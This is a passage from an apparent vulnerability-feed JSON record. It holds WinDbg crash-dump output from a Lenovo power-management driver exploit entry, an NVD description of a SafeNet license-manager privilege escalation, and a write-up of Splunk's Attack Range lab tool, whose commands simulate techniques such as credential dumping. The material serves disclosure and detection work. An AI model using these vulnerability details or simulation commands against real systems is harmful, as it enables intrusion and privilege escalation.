0x00007fff`33aaf844\r\n\r\n\r\nTHREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68\r\n\r\nTHREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb\r\n\r\nTHREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b\r\n\r\nFOLLOWUP_IP:\r\npmdrvs+109d\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\n\r\nFAULT_INSTR_CODE: 
8941078b\r\n\r\nSYMBOL_STACK_INDEX: 0\r\n\r\nFOLLOWUP_NAME: MachineOwner\r\n\r\nSTACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb\r\n\r\nBUGCHECK_STR: 2E8B5A19\r\n\r\nEXCEPTION_CODE_STR: 2E8B5A19\r\n\r\nEXCEPTION_STR: WRONG_SYMBOLS\r\n\r\nPROCESS_NAME: ntoskrnl.wrong.symbols.exe\r\n\r\nIMAGE_NAME: ntoskrnl.wrong.symbols.exe\r\n\r\nMODULE_NAME: nt_wrong_symbols\r\n\r\nSYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000\r\n\r\nBUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145\r\n\r\nDEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145\r\n\r\nPRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS\r\n\r\nFAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000\r\n\r\nTARGET_TIME: 2019-09-30T19:27:36.000Z\r\n\r\nOSBUILD: 17763\r\n\r\nOSSERVICEPACK: 0\r\n\r\nSERVICEPACK_NUMBER: 0\r\n\r\nOS_REVISION: 0\r\n\r\nSUITE_MASK: 272\r\n\r\nPRODUCT_TYPE: 1\r\n\r\nOSPLATFORM_TYPE: x64\r\n\r\nOSNAME: Windows 10\r\n\r\nOSEDITION: Windows 10 WinNt TerminalServer SingleUserTS\r\n\r\nOS_LOCALE: \r\n\r\nUSER_LCID: 0\r\n\r\nOSBUILD_TIMESTAMP: 1994-09-30 01:21:45\r\n\r\nBUILDDATESTAMP_STR: 180914-1434\r\n\r\nBUILDLAB_STR: rs5_release\r\n\r\nBUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434\r\n\r\nANALYSIS_SESSION_ELAPSED_TIME: ae\r\n\r\nANALYSIS_SOURCE: KM\r\n\r\nFAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000\r\n\r\nFAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}\r\n\r\nFollowup: MachineOwner\r\n---------\r\n\r\n2: kd> u fffff804`28bf109d\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\nfffff804`28bf109f 41894308 mov dword ptr [r11+8],eax\r\nfffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000)\r\nfffff804`28bf10a8 85c0 test eax,eax\r\nfffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 
(fffff804`28bf1132)\r\nfffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h]\r\nfffff804`28bf10b8 4885c9 test rcx,rcx\r\nfffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132)\r\n2: kd> !for_each_frame .frame /r @$Frame\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!KeBugCheckEx:\r\nfffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09\r\n01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7f09:\r\nfffff804`1f27a8e9 90 nop\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c\r\n02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f279d3c rsp=ffffc709dee8e460 
rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x735c:\r\nfffff804`1f279d3c b801000000 mov eax,1\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f\r\n03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!_chkstk+0x41f:\r\nfffff804`1f271b4f 0f1f00 nop dword ptr [rax]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440\r\n04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!RtlUnwindEx+0x3440:\r\nfffff804`1f1ca460 8bd0 mov edx,eax\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264\r\n05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264\r\nrax=ffffc709dee8e420 
rbx=ffffc709dee8f408 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000\r\nrip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40\r\nr14=ffffc709dee8f4b0 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!ExReleaseAutoExpandPushLockExclusive+0x264:\r\nfffff804`1f0d7c24 84c0 test al,al\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2\r\n06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2\r\nrax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7fe2:\r\nfffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce\r\n07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce\r\nrax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x42ce:\r\nfffff804`1f276cae 440f20c0 mov rax,cr8\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n08 ffffc709`dee8f640 
fffff804`28bf5060 pmdrvs+0x109d\r\n08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060\r\n09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000\r\nrip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\npmdrvs+0x5060:\r\nfffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a)\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59\r\n0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290\r\nrip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b 
efl=00000282\r\nnt!IofCallDriver+0x59:\r\nfffff804`1f12dba9 4883c438 add rsp,38h\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071\r\n0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290\r\nrip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtQueryInformationFile+0x1071:\r\nfffff804`1f6abb11 448bf0 mov r14d,eax\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc\r\n0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc\r\nrax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0\r\nrip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtClose+0xffc:\r\nfffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663)\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56\r\n0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56\r\nrax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8\r\nrip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 
r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtDeviceIoControlFile+0x56:\r\nfffff804`1f64c356 4883c468 add rsp,68h\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925\r\n0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925\r\nrax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8\r\nrip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7925:\r\nfffff804`1f27a305 0f1f00 nop dword ptr [rax]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844\r\n0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844\r\nrax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c\r\nrip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\n00007fff`33aaf844 ?? 
???\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\n\r\n# Mitigation\r\n\r\nUpdate to Lenovo Power Management driver version 1.67.17.48 or higher\n\n# 0day.today [2019-12-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33654"}], "cve": [{"lastseen": "2019-12-12T13:26:42", "bulletinFamily": "NVD", "description": "SafeNet Sentinel LDK License Manager, all versions prior to 7.101(only Microsoft Windows versions are affected) is vulnerable when configured as a service. This vulnerability may allow an attacker with local access to create, write, and/or delete files in system folder using symbolic links, leading to a privilege escalation. This vulnerability could also be used by an attacker to execute a malicious DLL, which could impact the integrity and availability of the system.", "modified": "2019-12-11T23:17:00", "id": "CVE-2019-18232", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18232", "published": "2019-12-11T23:15:00", "title": "CVE-2019-18232", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2019-12-12T00:25:16", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-9BGytRDmNUY/XfA3X9Qr_fI/AAAAAAAAREI/31Vq6PqurMQiMGPj7OKZaBZjivGSgqqWwCNcBGAsYHQ/s1600/attack_range_1_range.jpeg>)\n\n \nThe Attack Range solves two main challenges in development of detections. First, it allows the user to quickly build a small lab infrastructure as close as possible to your production environment. This lab infrastructure contains a [ Windows ](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) Domain Controller, Windows Workstation and Linux server, which comes pre-configured with multiple security tools and logging configuration. The infrastructure comes with a [ Splunk ](<https://www.kitploit.com/search/label/Splunk> \"Splunk\" ) server collecting multiple log sources from the different servers. 
\nSecond, this framework allows the user to perform attack simulation using different engines. Therefore, the user can repeatedly replicate and generate data as close to \"ground truth\" as possible, in a format that allows the creation of detections, investigations, knowledge objects, and playbooks in Splunk. \n \n** Architecture ** \nAttack Range can be used in two different ways: \n\n\n * local using vagrant and virtualbox \n * in the cloud using terraform and AWS \nIn order to make Attack Range work on almost every laptop, the local version using Vagrant and [ Virtualbox ](<https://www.kitploit.com/search/label/Virtualbox> \"Virtualbox\" ) consists of a subset of the full-blown cloud infrastructure in AWS using Terraform. The local version consists of a Splunk single instance and a Windows 10 workstation pre-configured with best practice logging configuration according to Splunk. The cloud infrastructure in AWS using [ Terraform ](<https://www.kitploit.com/search/label/Terraform> \"Terraform\" ) consists of a Windows 10 workstation, a Windows 2016 server and a Splunk server. 
More information can be found in the wiki \n \n\n\n[  ](<https://1.bp.blogspot.com/-9T8SYVL70Ww/XfA3eg-rfoI/AAAAAAAAREM/GKHzN5r6Xy8bADvUlV9kg9aQjIuYfqm-QCNcBGAsYHQ/s1600/attack_range_2_architecture.png>)\n\n \n** Configuration ** \n\n\n * [ vagrant and virtualbox ](<https://github.com/splunk/attack_range/wiki/Configure-Attack-Range-for-Vagrant> \"vagrant and virtualbox\" )\n * [ terraform and AWS ](<https://github.com/splunk/attack_range/wiki/Configure-Attack-Range-for-Terraform> \"terraform and AWS\" )\n \n** Running ** \nAttack Range supports different actions: \n\n\n * Build Attack Range \n * Perform Attack Simulation \n * Destroy Attack Range \n * Stop Attack Range \n * Resume Attack Range \n \n** Build Attack Range ** \n\n\n * Build Attack Range using ** Terraform **\n \n \n python attack_range.py -m terraform -a build\n\n * Build Attack Range using ** Vagrant **\n \n \n python attack_range.py -m vagrant -a build\n\n \n** Perform Attack Simulation ** \n\n\n * Perform Attack [ Simulation ](<https://www.kitploit.com/search/label/Simulation> \"Simulation\" ) using ** Terraform **\n \n \n python attack_range.py -m terraform -a simulate -st T1117,T1003 -t attack-range_windows_2016_dc\n\n * Perform Attack Simulation using ** Vagrant **\n \n \n python attack_range.py -m vagrant -a simulate -st T1117,T1003 -t win10\n\n \n** Destroy Attack Range ** \n\n\n * Destroy Attack Range using ** Terraform **\n \n \n python attack_range.py -m terraform -a destroy\n\n * Destroy Attack Range using ** Vagrant **\n \n \n python attack_range.py -m vagrant -a destroy\n\n \n** Stop Attack Range ** \n\n\n * Stop Attack Range using ** Terraform **\n \n \n python attack_range.py -m terraform -a stop\n\n * Stop Attack Range using ** Vagrant **\n \n \n python attack_range.py -m vagrant -a stop\n\n \n** Resume Attack Range ** \n\n\n * Resume Attack Range using ** Terraform **\n \n \n python attack_range.py -m terraform -a resume\n\n * Resume Attack Range using ** Vagrant **\n \n \n python 
attack_range.py -m vagrant -a resume\n\n \n** Support ** \nPlease use the [ GitHub issue tracker ](<https://github.com/splunk/attack_range/issues> \"GitHub issue tracker\" ) to submit bugs or request features. \nIf you have questions or need support, you can: \n\n\n * Post a question to [ Splunk Answers ](<http://answers.splunk.com/> \"Splunk Answers\" )\n * Join the [ #security-research ](<https://splunk-usergroups.slack.com/messages/C1RH09ERM/> \"#security-research\" ) room in the [ Splunk Slack channel ](<https://splunk-usergroups.slack.com/> \"Splunk Slack channel\" )\n * If you are a Splunk Enterprise customer with a valid support entitlement contract and have a Splunk-related question, you can also open a support case on the [ https://www.splunk.com/ ](<https://www.splunk.com/> \"https://www.splunk.com/\" ) support portal \n \n** Author ** \n\n\n * [ Jose Hernandez ](<https://twitter.com/d1vious> \"Jose Hernandez\" )\n \n** Contributors ** \n\n\n * [ Rod Soto ](<https://twitter.com/rodsoto> \"Rod Soto\" )\n * [ Bhavin Patel ](<https://twitter.com/hackpsy> \"Bhavin Patel\" )\n * [ Patrick Barei\u00df ](<https://twitter.com/bareiss_patrick> \"Patrick Barei\u00df\" )\n * Russ Nolen \n * Phil Royer \n \n** Acknowledgements ** \n\n\n * [ DetectionLab ](<https://github.com/clong/DetectionLab> \"DetectionLab\" )\n * Atomic Red team \n * Sysmon configuration \n \n \n\n\n** [ Download Attack_Range ](<https://github.com/splunk/attack_range> \"Download Attack_Range\" ) **\n", "modified": "2019-12-11T20:25:04", "published": "2019-12-11T20:25:04", "id": "KITPLOIT:7162804391274749673", "href": "http://www.kitploit.com/2019/12/splunk-attack-range-tool-that-allows.html", "title": "Splunk Attack Range - A Tool That Allows You To Create Vulnerable Instrumented Local Or Cloud Environments To Simulate Attacks Against And Collect The Data Into Splunk", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}]}